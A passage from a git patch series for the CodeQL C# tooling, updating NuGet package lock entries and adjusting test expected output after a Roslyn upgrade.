"System.Threading.Channels", "version": "7.0.0", "sha512": "sha512-XXmpdJbyVCagWg3bGfUGNTxKp4EK/3C4Bt8pXhKVYZKwHPjeHPOg0u2wdqHFsojU4u4i9KByAJTyzqLCMqwpUg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Threading.Tasks.Extensions"], "net462": ["System.Threading.Tasks.Extensions"], "net47": ["System.Threading.Tasks.Extensions"], "net471": ["System.Threading.Tasks.Extensions"], "net472": ["System.Threading.Tasks.Extensions"], "net48": ["System.Threading.Tasks.Extensions"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["System.Threading.Tasks.Extensions"], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Threading.Tasks.Extensions"], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Text.Encoding.CodePages", "id": "System.Text.Encoding.CodePages", "version": "9.0.0", "sha512": "sha512-rMAcE2cpS8RvPR5iK6WkYdZKJLsUw5BRqG3d/LR0dl8x17ezOj43AWRhp4LRIFgydWjOOn/Z4w//l8wcowngvQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Threading.Channels", "id": "System.Threading.Channels", "version": "9.0.0", "sha512": "sha512-6q+SC/qL5eeX9t3zUjmtsccStVusUvYXdJFYGf3ihM/8TionV+iZxi3mxDPPFXOiepRe7WgrIOuoaCi4+bwZ0g==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.Bcl.AsyncInterfaces", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.Bcl.AsyncInterfaces", "System.Threading.Tasks.Extensions"], "net47": ["Microsoft.Bcl.AsyncInterfaces", "System.Threading.Tasks.Extensions"], "net471": ["Microsoft.Bcl.AsyncInterfaces", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.Bcl.AsyncInterfaces", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.Bcl.AsyncInterfaces", "System.Threading.Tasks.Extensions"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.Bcl.AsyncInterfaces", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.Bcl.AsyncInterfaces", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.Bcl.AsyncInterfaces", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.Bcl.AsyncInterfaces", "System.Threading.Tasks.Extensions"], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Threading.Tasks", "id": "System.Threading.Tasks", "version": "4.3.0", "sha512": "sha512-fUiP+CyyCjs872OA8trl6p97qma/da1xGq3h4zAbJZk8zyaU4zyEfqW5vbkP80xG/Nimun1vlWBboMEk7XxdEw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard": [], "netstandard1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Threading.Tasks.Extensions", "id": "System.Threading.Tasks.Extensions", "version": "4.5.4", "sha512": "sha512-aAUghud9PHGYc3o9oWPWd0C3xE+TJQw5ZZs78htlR6mr9ky/QEgfXHjyQ2GvOq9H1S0YizcVVKCSin92ZcH8FA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": ["System.Runtime.CompilerServices.Unsafe"], "net451": ["System.Runtime.CompilerServices.Unsafe"], "net452": ["System.Runtime.CompilerServices.Unsafe"], "net46": ["System.Runtime.CompilerServices.Unsafe"], "net461": ["System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Runtime.CompilerServices.Unsafe"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netcoreapp1.1": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netcoreapp2.0": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.1": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.2": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.3": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.4": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.5": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard1.6": ["System.Runtime", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks"], "netstandard2.0": ["System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "System.Threading.Tasks.Extensions", "id": "System.Threading.Tasks.Extensions", "version": "4.6.0", "sha512": "sha512-ph8eP2gKhA6mNhj/teYwn9xCrHMc7+nBMlSMKX7BUXcZn33RVLe45TWABkcgyS6TJWYx1v1WwtylHmF3Fvg0qQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Runtime.CompilerServices.Unsafe"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Threading.ThreadPool", "id": "System.Threading.ThreadPool", "version": "4.3.0", "sha512": "sha512-RQpA+UpI6Tlpeedk5JStYk2DM/M3i5HqabI/yDbfj1xDu9bIz9kdoquVpHbh/wQjOJaOCbcgRH8iQcAUv8dRWQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["System.Runtime", "System.Runtime.Handles"], "net6.0": ["System.Runtime", "System.Runtime.Handles"], "net7.0": ["System.Runtime", "System.Runtime.Handles"], "net8.0": ["System.Runtime", "System.Runtime.Handles"], "net9.0": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp1.0": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp1.1": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp2.0": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp2.1": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp2.2": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp3.0": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp3.1": ["System.Runtime", "System.Runtime.Handles"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["System.Runtime", "System.Runtime.Handles"], "netstandard1.4": ["System.Runtime", "System.Runtime.Handles"], "netstandard1.5": ["System.Runtime", "System.Runtime.Handles"], "netstandard1.6": ["System.Runtime", "System.Runtime.Handles"], "netstandard2.0": ["System.Runtime", "System.Runtime.Handles"], "netstandard2.1": ["System.Runtime", "System.Runtime.Handles"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "xunit", "id": "xunit", "version": "2.9.2", "sha512": "sha512-bs4ccplaqCT7+jdAJhtt75uKq9qA3Jeld1ugiOgGEGSnzq8gkoa0VUqNEKkMPkBwV5COlAllNJGtGBfgxoZDrA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net20": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net30": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net35": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net40": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net403": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net45": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net451": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net452": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net46": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net461": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net462": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net47": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net471": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net472": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net48": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net5.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net6.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net7.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net8.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net9.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp1.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp1.1": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp2.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp2.1": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp2.2": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp3.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp3.1": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.1": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.2": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.3": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.4": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.5": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.6": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard2.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard2.1": ["xunit.core", "xunit.assert", "xunit.analyzers"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "xunit.abstractions", "id": "xunit.abstractions", "version": "2.0.3", "sha512": "sha512-PKJri5f0qEQPFvgY6CZR9XG8JROlWSdC/ZYLkkDQuID++Egn+yWjB+Yf57AZ8U6GRlP7z33uDQ4/r5BZPer2JA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "xunit.analyzers", "id": "xunit.analyzers", "version": "1.16.0", "sha512": "sha512-65QLxnRoOqpAn2hMnjI1FLmQEjzUye2h4MwRVe1k151K+UFG1Ehr/s/MLwNJ6pCNoyoJjOoNuF7OGW4mH2bdaQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "xunit.analyzers", "id": "xunit.analyzers", "version": "1.17.0", "sha512": "sha512-36BC2a5gEL5TDXjkzhD8dK4toNcPGdwFb4tbIODwTp4eXhRS6BURiTclfZD2vFNTq4obCzPOdwnayhppP4qtUg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "xunit.assert", "id": "xunit.assert", "version": "2.9.2", "sha512": "sha512-huNfINLH5HnyiPImimKv7liIJJ2MgRdJYT7ky3464zR62SH7o9JjsgMiSZRXha46kgTCNjKSNN1VvctC+USp7w==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "xunit.core", "id": "xunit.core", "version": "2.9.2", "sha512": "sha512-kW48d7YL7ryT4zuWTjJN491cJwY8aYiIAxDaXJRebgMIw40PmlREiiaIz33QUFmglcfLlaoRyZcI4sl70kARiw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net20": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net30": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net35": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net40": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net403": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net45": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net451": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net452": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net46": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net461": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net462": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net47": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net471": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net472": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net48": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net5.0": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net6.0": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net7.0": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net8.0": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net9.0": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netcoreapp1.0": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netcoreapp1.1": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netcoreapp2.0": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netcoreapp2.1": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netcoreapp2.2": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netcoreapp3.0": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netcoreapp3.1": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netstandard": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netstandard1.0": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netstandard1.1": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netstandard1.2": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netstandard1.3": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netstandard1.4": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netstandard1.5": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netstandard1.6": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netstandard2.0": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netstandard2.1": ["xunit.extensibility.core", "xunit.extensibility.execution"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "xunit.extensibility.core", "id": "xunit.extensibility.core", "version": "2.9.2", "sha512": "sha512-sosk+dg5Cn4N9MKOjQ1wFTvfgduqiX1DLRZHEYXIaLOuTJbCJeXfn7XhAVDGY+zeB8aX3jCKL8BcDp4EJCdZXw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": ["xunit.abstractions"], "net451": ["xunit.abstractions"], "net452": ["xunit.abstractions"], "net46": ["xunit.abstractions"], "net461": ["xunit.abstractions"], "net462": ["xunit.abstractions"], "net47": ["xunit.abstractions"], "net471": ["xunit.abstractions"], "net472": ["xunit.abstractions"], "net48": ["xunit.abstractions"], "net5.0": ["xunit.abstractions"], "net6.0": ["xunit.abstractions"], "net7.0": ["xunit.abstractions"], "net8.0": ["xunit.abstractions"], "net9.0": ["xunit.abstractions"], "netcoreapp1.0": ["xunit.abstractions"], "netcoreapp1.1": ["xunit.abstractions"], "netcoreapp2.0": ["xunit.abstractions"], "netcoreapp2.1": ["xunit.abstractions"], "netcoreapp2.2": ["xunit.abstractions"], "netcoreapp3.0": ["xunit.abstractions"], "netcoreapp3.1": ["xunit.abstractions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": ["xunit.abstractions"], "netstandard1.2": ["xunit.abstractions"], "netstandard1.3": ["xunit.abstractions"], "netstandard1.4": ["xunit.abstractions"], "netstandard1.5": ["xunit.abstractions"], "netstandard1.6": ["xunit.abstractions"], "netstandard2.0": ["xunit.abstractions"], "netstandard2.1": ["xunit.abstractions"]}, "targeting_pack_overrides": [], "framework_list": []}, From 6a0d56a1464f349c78044ac12953bdb720044854 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 4 Dec 2024 15:45:10 +0100 Subject: [PATCH 0875/1267] C#: Update DataQuality output. Roslyn now correctly finds the compile time target. --- .../Telemetry/DatabaseQuality/IsNotOkayCall.expected | 1 - .../query-tests/Telemetry/DatabaseQuality/NoTarget.expected | 1 - csharp/ql/test/query-tests/Telemetry/DatabaseQuality/Quality.cs | 2 +- 3 files changed, 1 insertion(+), 3 deletions(-) diff --git a/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/IsNotOkayCall.expected b/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/IsNotOkayCall.expected index 205022b7180..7555a37394b 100644 --- a/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/IsNotOkayCall.expected +++ b/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/IsNotOkayCall.expected @@ -1,4 +1,3 @@ | Quality.cs:26:19:26:26 | access to indexer | Call without target $@. | Quality.cs:26:19:26:26 | access to indexer | access to indexer | | Quality.cs:29:21:29:27 | access to indexer | Call without target $@. | Quality.cs:29:21:29:27 | access to indexer | access to indexer | | Quality.cs:32:9:32:21 | access to indexer | Call without target $@. | Quality.cs:32:9:32:21 | access to indexer | access to indexer | -| Quality.cs:34:21:34:25 | object creation of type null | Call without target $@. | Quality.cs:34:21:34:25 | object creation of type null | object creation of type null | diff --git a/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/NoTarget.expected b/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/NoTarget.expected index 84b6994e033..7ae469cf84e 100644 --- a/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/NoTarget.expected +++ b/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/NoTarget.expected @@ -10,6 +10,5 @@ | Quality.cs:26:19:26:26 | access to indexer | Call without target $@. | Quality.cs:26:19:26:26 | access to indexer | access to indexer | | Quality.cs:29:21:29:27 | access to indexer | Call without target $@. | Quality.cs:29:21:29:27 | access to indexer | access to indexer | | Quality.cs:32:9:32:21 | access to indexer | Call without target $@. | Quality.cs:32:9:32:21 | access to indexer | access to indexer | -| Quality.cs:34:21:34:25 | object creation of type null | Call without target $@. | Quality.cs:34:21:34:25 | object creation of type null | object creation of type null | | Quality.cs:38:16:38:26 | access to property MyProperty2 | Call without target $@. | Quality.cs:38:16:38:26 | access to property MyProperty2 | access to property MyProperty2 | | Quality.cs:50:20:50:26 | object creation of type T | Call without target $@. | Quality.cs:50:20:50:26 | object creation of type T | object creation of type T | diff --git a/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/Quality.cs b/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/Quality.cs index c3ec759d687..31f4deda5df 100644 --- a/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/Quality.cs +++ b/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/Quality.cs @@ -31,7 +31,7 @@ public class Test Span guidBytes = stackalloc byte[16]; guidBytes[08] = 1; // TODO: this indexer call has no target, because the target is a `ref` returning getter. - new MyList([new(), new Test()]); // TODO: the `new()` call has no target, which is unexpected, as we know at compile time, that this is a `new Test()` call. + new MyList([new(), new Test()]); } public int MyProperty1 { get; } From 61fa889190e89ab423fd8fa5185d8f360f9d0ada Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 4 Dec 2024 16:04:15 +0100 Subject: [PATCH 0876/1267] C#: Update the format test expected output as the params keyword is now extracted correctly. --- .../format/StringFormatItemParameter.expected | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/csharp/ql/test/library-tests/frameworks/format/StringFormatItemParameter.expected b/csharp/ql/test/library-tests/frameworks/format/StringFormatItemParameter.expected index 978e1340492..53106dd756e 100644 --- a/csharp/ql/test/library-tests/frameworks/format/StringFormatItemParameter.expected +++ b/csharp/ql/test/library-tests/frameworks/format/StringFormatItemParameter.expected @@ -1,4 +1,3 @@ -| Console | Write(string, ReadOnlySpan) | arg | | Console | Write(string, object) | arg0 | | Console | Write(string, object, object) | arg0 | | Console | Write(string, object, object) | arg1 | @@ -6,7 +5,7 @@ | Console | Write(string, object, object, object) | arg1 | | Console | Write(string, object, object, object) | arg2 | | Console | Write(string, params Object[]) | arg | -| Console | WriteLine(string, ReadOnlySpan) | arg | +| Console | Write(string, params ReadOnlySpan) | arg | | Console | WriteLine(string, object) | arg0 | | Console | WriteLine(string, object, object) | arg0 | | Console | WriteLine(string, object, object) | arg1 | @@ -14,10 +13,10 @@ | Console | WriteLine(string, object, object, object) | arg1 | | Console | WriteLine(string, object, object, object) | arg2 | | Console | WriteLine(string, params Object[]) | arg | +| Console | WriteLine(string, params ReadOnlySpan) | arg | | Debug | Assert(bool, string, string, params Object[]) | args | | Debug | Print(string, params Object[]) | 